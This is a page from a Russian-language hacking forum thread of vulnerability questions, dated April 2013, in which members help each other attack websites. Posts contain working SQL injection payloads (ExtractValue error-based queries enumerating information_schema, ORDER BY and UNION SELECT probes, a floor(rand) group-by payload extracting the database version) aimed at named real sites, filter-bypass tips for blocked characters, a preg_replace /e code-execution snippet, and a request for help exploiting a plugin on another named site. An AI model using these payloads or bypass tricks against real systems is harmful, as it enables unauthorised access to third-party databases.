HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2232 из 2438 « Первая < 12321732213221822222 2228 2229 2230 2231 2232 2233 2234 2235 2236 224222822332 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #22311  
Старый 05.04.2013, 19:05
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
Какой ахтунг. А кто будет указывать в функции модификатор?

Like this - preg_replace("//e", "payload", NULL);
 
Ответить с цитированием

  #22312  
Старый 07.04.2013, 10:05
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034

Репутация: 0
По умолчанию
Есть слепая скуля и запрос вида 1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x25757365727325)and( data_length>0)))))='

ответ выдает ошибку syntax to use near ';0)))))='1'

скуля не выполняется полностью из-за знака ">" в запросе, т.к. меняется на &gt; и обваливается

Вопрос: как правильно оформить или вернее можно ли поменять знак ">" ?
 
Ответить с цитированием

  #22313  
Старый 07.04.2013, 10:53
BlackIce
Guest
Сообщений: n/a
Провел на форуме:
18665

Репутация: 27
По умолчанию
Цитата:
Сообщение от Sanic1977  
Sanic1977 said:
Есть слепая скуля и запрос вида 1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x25757365727325)and( data_length>0)))))='
ответ выдает ошибку syntax to use near ';0)))))='1'
скуля не выполняется полностью из-за знака ">" в запросе, т.к. меняется на &gt; и обваливается
Вопрос: как правильно оформить или вернее можно ли поменять знак ">" ?
попробуй вместо > подставить !=
 
Ответить с цитированием

  #22314  
Старый 07.04.2013, 10:56
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034

Репутация: 0
По умолчанию
Цитата:
Сообщение от BlackIce  
BlackIce said:
попробуй вместо > подставить !=
да об этом знаю. работает только ответ Subquery returns more than 1 row

а как сделать на интервале 0..10 или

like(0x25757365727325)and( data_length>0)and( data_length
 
Ответить с цитированием

  #22315  
Старый 07.04.2013, 11:14
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
[QUOTE="Sanic1977"]
Sanic1977 said:
да об этом знаю. работает только ответ Subquery returns more than 1 row
а как сделать на интервале 0..10 или
like(0x25757365727325)and( data_length>0)and( data_length0)and( data_length
 
Ответить с цитированием

  #22316  
Старый 07.04.2013, 11:39
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034

Репутация: 0
По умолчанию
Цитата:
Сообщение от BigBear  
BigBear said:
data_length not in (0)
data_length between (0) and (10)
такая конструкция не работает

выдает syntax to use near 'between((0)and(10))))))='1
 
Ответить с цитированием

  #22317  
Старый 07.04.2013, 18:55
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от Sanic1977  
Sanic1977 said:
такая конструкция не работает
выдает syntax to use near 'between
(
(0)and(10)
)
))))='1
between(0)and(10)))))='1
 
Ответить с цитированием

  #22318  
Старый 07.04.2013, 22:41
m1d$
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
как можно раскрутить highlight.php ??

например http://www.itwire .com/plugins/system/highlight/highlight.php

Уязвимость > http://1337day.com/exploit/description/20447

Хотя-бы намёк дайте,пожалуйста.
 
Ответить с цитированием

  #22319  
Старый 11.04.2013, 12:34
Улыбайся
Guest
Сообщений: n/a
Провел на форуме:
18621

Репутация: 3
По умолчанию
http://animemagazine.info/index.php?productID=1+order+by+4+--+

http://animemagazine.info/index.php?productID=-1+union+select+1,2,3,4+--+

Тело письма говорит



Как вывести принтабельные поля?
 
Ответить с цитированием

  #22320  
Старый 11.04.2013, 13:05
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от Улыбайся  
Улыбайся said:
http://animemagazine.info/index.php?productID=1+order+by+4+--+
http://animemagazine.info/index.php?productID=-1+union+select+1,2,3,4+--+
Тело письма говорит

Как вывести принтабельные поля?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//animemagazine.info/index.php?productID=1%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR] 
 
Ответить с цитированием
Ответ
Страница 2232 из 2438 « Первая < 12321732213221822222 2228 2229 2230 2231 2232 2233 2234 2235 2236 224222822332 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ